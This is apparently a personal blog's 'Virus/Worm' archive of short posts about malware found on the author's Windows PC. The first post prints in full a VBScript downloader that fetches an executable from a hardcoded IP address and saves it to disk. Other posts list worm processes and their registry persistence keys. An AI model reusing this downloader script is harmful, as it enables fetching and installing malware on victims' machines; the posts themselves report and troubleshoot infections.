Category Archives: Virus/Worm

iget.vbe

I just found a virus like file under c:\, the content is: Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://222.66.200.102:8080/1/3.exe",0xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "C\1.exe",2 Advertisements

Posted in Virus/Worm | Leave a comment

mravsc32.exe

This worm created a lot of TCP connection and affected normal internet usage. It will spawn another process once it is killed. Well, I can suspend it and then google a solution.

Posted in Virus/Worm | Leave a comment

sddriver.exe

sddriver.exe seems to be a worm, it initialed a lot of connections (can be seen in TCPView.exe) and affected normal use of web browser. It is found in the following registry entries, but the file is not found in disk.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunCall … Continue reading

Posted in Virus/Worm | Leave a comment

Firefox displays blank page for many urls

Today when I am surfing internet, suddenly Firefox can’t open new pages correctly — just be blank. After launching TCPView.exe I found rundll.exe (PID=4848) making lots of connection attempts, much like a virus/worm, so I killed it and firefox resumed … Continue reading

Posted in Virus/Worm | Leave a comment

wishs.exe — virus or worm?

Wishs.exe is found in the following registry[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]Microsoft=wishs.exe[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]Microsoft=wishs.exe[HKEY_USERS\.DEFAULT\Software\ASProtect]Microsoft=wishs.exe

Posted in Virus/Worm | 1 Comment